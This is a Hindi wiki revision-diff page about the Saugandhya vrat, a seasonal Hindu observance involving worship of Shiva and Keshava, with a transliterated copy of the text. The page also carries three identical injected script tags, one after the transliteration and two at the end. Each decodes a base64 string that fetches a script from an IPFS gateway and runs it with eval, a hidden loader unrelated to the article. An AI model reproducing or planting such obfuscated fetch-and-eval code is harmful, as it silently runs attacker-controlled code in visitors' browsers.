Difference between revisions of "सौगन्ध्य व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*भारत में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा ...' के साथ नया पन्ना बनाया)
 
m (Text replace - ")</ref" to "</ref")
 
(3 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*यह ऋतुव्रत है।
 
*यह ऋतुव्रत है।
 
*देवता [[शिव]] एवं [[केशव]] की पूजा करनी चाहिए।
 
*देवता [[शिव]] एवं [[केशव]] की पूजा करनी चाहिए।
 
*[[हेमन्त ऋतु|हेमन्त]] एवं [[शिशिर ऋतु|शिशिर]] में [[भारत के पुष्प|पुष्पों]] का तथा [[फाल्गुन]] [[पूर्णिमा]] को तीन प्रकार के सुगन्धित पत्रों का त्याग करना चाहिए।  
 
*[[हेमन्त ऋतु|हेमन्त]] एवं [[शिशिर ऋतु|शिशिर]] में [[भारत के पुष्प|पुष्पों]] का तथा [[फाल्गुन]] [[पूर्णिमा]] को तीन प्रकार के सुगन्धित पत्रों का त्याग करना चाहिए।  
*'शिव एवं केशव मुझ पर प्रसन्न हों' के साथ कुछ सोने का दान करना चाहिए।<ref> हेमाद्रि (व्रतखण्ड 2, 860)</ref>
+
*'शिव एवं केशव मुझ पर प्रसन्न हों' के साथ कुछ सोने का दान करना चाहिए।<ref> हेमाद्रि (व्रतखण्ड 2, 860</ref>
  
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 12:45, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • yah rrituvrat hai.
  • devata shiv evan keshav ki pooja karani chahie.
  • hemant evan shishir mean pushpoan ka tatha phalgun poornima ko tin prakar ke sugandhit patroan ka tyag karana chahie.
  • 'shiv evan keshav mujh par prasann hoan' ke sath kuchh sone ka dan karana chahie.[1]

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. hemadri (vratakhand 2, 860

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>